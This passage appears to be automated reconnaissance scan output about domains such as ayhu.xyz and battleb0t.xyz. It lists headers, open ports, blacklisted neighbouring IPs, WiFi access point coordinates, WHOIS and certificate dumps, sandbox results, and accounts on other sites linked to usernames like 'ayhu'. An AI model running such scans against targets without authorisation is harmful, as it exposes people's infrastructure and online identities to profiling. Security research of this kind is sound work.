45:9e:26:1e:62:2f:e5:b0:c1:a2:6e:6b:64:03:05:91:c5:ca:
50:6d:e8:c1:41:d8:07:0e:25:58:e8:76:72:9e:b3:02:79:6d:
1c:be:17:b1:a7:32:cd:3e:e0:3c:2c:87:d6:3f:c4:48:c0:a3:
08:59:a0:4e:0f:07:7f:61:15:d7:87:60:df:16:46:c9:31:1c:
35:61:49:d1:30:f6:df:8b:a1:f3:b4:55:7d:23:f2:7e:02:d1:
77:34:24:b1:27:08:2c:2f:5f:8e:75:03:e6:17:9c:33:bc:f3:
b6:45:1b:5b:14:7b:ab:6c:5f:cc:d8:bb:78:b2:59:03:74:72:
01:65:2e:6e:c2:e6:b0:7e:32:e9:3b:23:f0:2f:a8:b0:4a:66:
8f:c0:d5:69
|
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 0 | 3 | 0 | None | cloudflare | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=fiT%2Fr8CwWrAQPZkt8VpkeQoVoGOR6HuHPRasaTPIcW93tfGJar9pTikOfGdSWQA5SZHUpCyuk56gghqLlY9yU5dVDbV5Bs9yRYYuQ0D9hZe3tyWEFUstq9XRCg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:21 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c594cb34339-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:00:53 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 0047ol.github.io | 185.199.111.153 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | TSMD 2.4 (Net ID: 00:02:6F:FD:8B:6E) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | GP (Net ID: 00:01:24:F1:7F:54) | 37.7813933,-122.3918002 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Galatasaray (Net ID: 00:02:CF:E2:4D:A2) | 40.2024, 29.0398 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 6 | 0 | None | cross-origin-resource-policy: same-origin | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=A6pUH5BrVxAUHCFyEeZi9CXof2Qs7NDG4lIwx2vXWTr3bfLmD6TvAbu9CC5NAPxdf7YdVt%2FA3H1mkzjba6JtFsZlXS70vO%2B%2Fyr5MWISSAsLD5ovFUcdhiD4vPP8ctfc%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:23 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f60726fad1912-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Heylink (Category: misc)
https://heylink.me/ayhu/ | ayhu |
| 2023-05-12 03:32:11 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.6:8443 | 188.114.97.0/24 |
| 2023-05-12 02:45:36 | Affiliate - Internet Name | No | DNS Raw Records | 0 | 0 | 2 | 0 | None | frabjous-lebkuchen-324004.netlify.app | funny.battleb0t.xyz |
| 2023-05-12 02:54:19 | Web Content Type | No | Web Spider | 0 | 0 | 2 | 0 | None | text/html;charset=utf-8 | fluid.battleb0t.xyz |
| 2023-05-12 03:01:24 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.235): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | myLGNet (Net ID: 00:01:36:2E:39:B8) | 34.0544, -118.244 |
| 2023-05-12 03:01:26 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.252): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:01:36 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.131): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:01:32 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.76): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Sitecom (Net ID: 00:0C:F6:34:4B:10) | 50.8897, 6.0563 |
| 2023-05-12 02:54:12 | Raw Data from RIRs | No | Hybrid Analysis | 1 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://bcpzonasegurabeta.viabcp.com', u'type': u'extracted', u'verdict': u'malicious'}]}, u'total_processes': 33, u'threat_score': 50, u'compromised_hosts': [u'185.199.108.153'], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://yeulpay.com/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:5812:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:5812:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:5812:120:WilError_01"\n "Local\\SM0:5576:304:WilStaging_02"\n "Local\\SM0:5576:120:WilError_01"\n "SM0:5576:120:WilError_01"\n "InternetShortcutMutex"\n "Local\\SM0:5812:120:WilError_01"\n "Local\\SM0:5812:304:WilStaging_02"\n "ChromeProcessSingletonStartup!"\n "SM0:5812:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:5812:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.109.153:49730"\n "68.142.107.4:49733"\n "142.250.191.74:49734"\n "142.251.46.227:49735"\n "142.250.189.232:49736"\n "142.250.191.78:49744"\n "185.199.108.153:49747"\n "23.55.103.80:49749"'}, {u'category': u'General', u'origin': u'Network Traffic', 
| 185.199.109.153 |
| 2023-05-12 02:55:36 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | | 104.21.6.166 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | BiggerPockets (Category: finance)
https://www.biggerpockets.com/users/login | login |
| 2023-05-12 02:54:19 | Linked URL - Internal | No | Web Spider | 4 | 0 | 3 | 0 | None | https://fluid.battleb0t.xyz/./script.js | https://fluid.battleb0t.xyz/ |
| 2023-05-12 02:53:14 | Raw Data from RIRs | No | Hybrid Analysis | 2 | 0 | 2 | 0 | None | | 185.199.109.153 |
| 2023-05-12 03:01:38 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.153): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | SitecomC3D648 (Net ID: 00:0C:F6:C3:D6:48) | 50.8897, 6.0563 |
| 2023-05-12 03:24:30 | Affiliate - Company Name | No | Company Name Extractor | 0 | 0 | 7 | 0 | None | NAMECHEAP INC | Domain Name: NETCRAFT.COM
Registry Domain ID: 509179_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2022-12-07T10:43:50Z
Creation Date: 1994-10-18T04:00:00Z
Registry Expiry Date: 2026-10-17T04:00:00Z
Registrar: NameCheap, Inc.
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.6613102107
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: AUTHNS1.NETCRAFT.COM
Name Server: AUTHNS2.NETCRAFT.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:12:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain name: netcraft.com
Registry Domain ID: 509179_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2020-09-21T12:40:37.88Z
Creation Date: 1994-10-18T04:00:00.00Z
Registrar Registration Expiration Date: 2026-10-17T04:00:00.00Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Reseller: NAMECHEAP INC
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: Redacted for Privacy
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region
Registrant Postal Code: 101
Registrant Country: IS
Registrant Phone: +354.4212434
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: fd796f83a89a42f2a69f4b9f2c757b8f.protect@withheldforprivacy.com
Registry Admin ID:
Admin Name: Redacted for Privacy
Admin Organization: Privacy service provided by Withheld for Privacy ehf
Admin Street: Kalkofnsvegur 2
Admin City: Reykjavik
Admin State/Province: Capital Region
Admin Postal Code: 101
Admin Country: IS
Admin Phone: +354.4212434
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: fd796f83a89a42f2a69f4b9f2c757b8f.protect@withheldforprivacy.com
Registry Tech ID:
Tech Name: Redacted for Privacy
Tech Organization: Privacy service provided by Withheld for Privacy ehf
Tech Street: Kalkofnsvegur 2
Tech City: Reykjavik
Tech State/Province: Capital Region
Tech Postal Code: 101
Tech Country: IS
Tech Phone: +354.4212434
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: fd796f83a89a42f2a69f4b9f2c757b8f.protect@withheldforprivacy.com
Name Server: authns1.netcraft.com
Name Server: authns2.netcraft.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-11T07:56:11.35Z <<<
For more information on Whois status codes, please visit https://icann.org/epp |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | typhoon (Net ID: 00:14:C1:39:FA:69) | 40.2024, 29.0398 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | helena (Net ID: 00:06:25:90:14:E1) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:55:05 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c5bc4bf4f0229c3-ORD
Content-Encoding: gzip
| 188.114.97.1 |
| 2023-05-12 02:59:09 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:18:ae:06:7e:fc:0b:78:46:5c:8b:fe:1a:31:bf:5b:16:b8
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 13 17:51:43 2022 GMT
Not After : Mar 13 17:51:42 2023 GMT
Subject: CN=*.ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:d2:a8:d4:9f:a9:bd:76:f3:4e:fa:75:b4:78:5e:
d8:6a:71:e4:f3:f9:c2:77:fe:f9:7d:4c:da:66:22:
e0:cd:34:b7:7c:8d:14:1c:4d:7d:46:bd:0d:78:0c:
dd:5b:c4:ff:9f:13:d1:36:82:30:3b:b9:24:f9:65:
eb:d4:82:59:47:e9:be:2d:ca:25:2b:a1:b5:27:87:
63:33:e8:be:3d:46:8c:9b:0f:9e:b7:28:4d:eb:79:
63:20:73:aa:a3:d5:3d:c6:2e:b7:9c:7f:e7:f8:96:
79:6d:51:52:62:f7:cc:65:ca:dd:5b:ef:27:c9:9c:
81:e6:4a:8c:e9:e1:99:cd:79:f8:60:4b:a5:6b:6f:
c9:a2:fa:cc:0c:e7:34:b2:77:b5:de:bd:fe:24:a9:
e6:e9:26:4a:54:ec:0f:53:69:fc:a9:cb:fb:84:2e:
7d:af:75:b6:15:ef:6d:e3:fb:23:27:72:c7:fd:a8:
77:78:c9:f6:5b:6f:b1:0a:09:7c:e3:91:c1:95:13:
b4:4a:b2:6f:b1:ab:4c:4d:0b:11:8c:fd:8d:fb:d9:
37:66:3b:07:7b:cc:19:50:a2:89:0c:ea:8d:f1:d1:
b3:36:06:ad:51:15:23:e4:0c:43:f6:cc:90:55:fa:
98:c8:81:54:f2:2f:f7:d0:0b:4f:9f:38:a8:6c:71:
67:c5
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
46:DD:F2:80:57:6C:FD:50:6F:F3:DF:3E:F6:D6:F8:E4:B9:2D:C4:6F
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:*.ayhu.xyz, DNS:ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Dec 13 18:51:43.785 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:E2:3A:9E:51:10:7B:4C:32:13:F1:5A:
6A:72:5F:B6:48:D3:B8:D4:7D:48:A2:D1:1B:9F:EB:E7:
11:FF:38:46:00:02:21:00:D3:77:1A:17:F1:84:6D:6C:
D3:83:45:FF:8A:32:05:10:85:83:2B:14:0A:F5:20:00:
0A:C7:41:FB:1B:F5:B4:74
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Dec 13 18:51:43.756 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:A6:36:07:C7:E6:2A:25:82:42:12:4D:
3F:F8:74:7A:85:A6:64:36:C2:59:78:48:20:18:36:E7:
26:72:A3:D3:2A:02:21:00:CE:BD:F6:83:26:75:28:EF:
BF:A1:B5:32:8B:FB:88:31:3E:85:D6:30:F1:F3:D4:9D:
92:CD:06:30:FD:39:59:E8
Signature Algorithm: sha256WithRSAEncryption
a9:06:04:95:e2:ce:64:b2:f3:1c:fd:0a:94:52:d2:fb:cc:c9:
bb:ab:0e:16:c4:1c:35:3d:b4:77:7c:ef:d6:ce:15:8a:5b:9e:
15:7d:14:b0:74:3a:46:24:d1:6f:34:39:94:aa:e4:7f:b3:c9:
dd:04:77:c5:ed:88:f9:56:f6:b2:da:16:f2:de:95:4d:ae:cc:
c8:8f:2c:fe:b6:1f:27:28:b2:fe:3a:41:41:5e:a9:6f:ac:34:
59:b2:f1:77:96:18:6e:7d:12:a0:7b:52:1d:2d:59:87:c8:35:
17:48:37:92:0d:56:c5:76:a2:4a:4c:44:69:ac:a7:c0:72:d3:
f1:3c:5f:67:11:8b:f4:4a:b6:30:14:01:f3:f3:67:9a:5c:2e:
68:09:32:e8:4e:f1:3c:d1:09:b1:a6:43:2f:3e:bb:09:66:13:
cc:5d:ab:f8:25:f6:78:95:33:b3:b2:17:2b:15:e6:77:00:0d:
a1:3e:62:fc:76:b4:f3:f1:09:99:3e:08:aa:64:da:d8:5e:3a:
0f:1e:07:1c:09:b4:d2:9f:70:f7:12:f8:0a:19:e8:db:b1:ab:
d6:b6:c1:9f:ab:18:be:a8:46:0e:6f:9c:06:b3:0d:0a:44:0f:
f9:65:04:25:ce:38:c1:7b:7d:87:a9:b5:0f:1d:54:1a:8b:7d:
b8:c2:59:33
| ayhu.xyz |
| 2023-05-12 03:09:30 | Co-Hosted Site - Domain Name | No | DNS Resolver | 2 | 0 | 3 | 0 | None | ply.gg | ply.gg |
| 2023-05-12 03:28:39 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.160:8080 | 188.114.96.0/24 |
| 2023-05-12 03:18:25 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | StreamLabs (Category: finance)
https://streamlabs.com/Altpapier/tip | Altpapier |
| 2023-05-12 03:23:35 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.13:8080 | 188.114.96.0/24 |
| 2023-05-12 03:32:23 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.12:8443 | 188.114.97.0/24 |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | Bandlab (Category: music)
https://www.bandlab.com/ayshoo | ayshoo |
| 2023-05-12 03:16:28 | Physical Location | No | ipapi.co | 0 | 0 | 3 | 0 | None | Frankfurt am Main, Hesse, HE, Germany, DE | 165.232.113.85 |
| 2023-05-12 03:04:14 | Malicious Affiliate | Yes | abuse.ch | 0 | 1 | 3 | 0 | None | abuse.ch URLhaus (Domain) [cdn-185-199-111-153.github.com]
https://urlhaus.abuse.ch/downloads/csv_recent/ | cdn-185-199-111-153.github.com |
| 2023-05-12 03:00:54 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 007us.github.io | 185.199.111.153 |
| 2023-05-12 02:57:13 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 65, u'compromised_hosts': [u'34.196.254.27', u'34.196.254.27'], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'http://www.finops.org/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"www.finops.org"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_992"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_3e0_IE_EarlyTabStart_0xfe4_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_3e0_ConnHashTable<992>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_3e0_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_3e0_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n 
"Local\\InternetShortcutMutex"\n "IsoScope_3e0_ConnHashTable<992>_HashTable_Mutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_3e0_IESQMMUTEX_0_519"\n "IsoScope_3e0_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_992"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.196.254.27:80"\n "34.196.254.27:443"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar1485.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab1484.tmp" has type "Microsoft Cabinet archive data 61745 bytes 1 file"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 61745 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442" has type "data"- Location: 
[%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442]- [targetUID: 00000000-00000992]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00000604]\n "RecoveryStore._C7A4F1AE-D920-11E7-B48D-080027D44A30_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._54909F69-387D-11ED-9389-080027B1E0B5_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00000992]\n "EPBU3KIU.txt" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\0CH0OVJV\\EPBU3KIU.txt]- [targetUID: 00000000-00000604]\n "~DF0A8636DE63BD2D47.TMP" has type "data"- Location: [%TEMP%\\~DF0A8636DE63BD2D47.TMP]- [targetUID: 00000000-00000992]\n "GCFEQE6O.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\GCFEQE6O.txt]- [targetUID: 00000000-00000992]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "PNG image data 16 x 16 4-bit colormap non-interlaced"- [targetUID: N/A]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00000604]\n "dnserror_1_" has type "HTML document UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "Cab1484.tmp" has type "Microsoft Cabinet archive data 61745 bytes 1 file"- Location: [%TEMP%\\Cab1484.tmp]- 
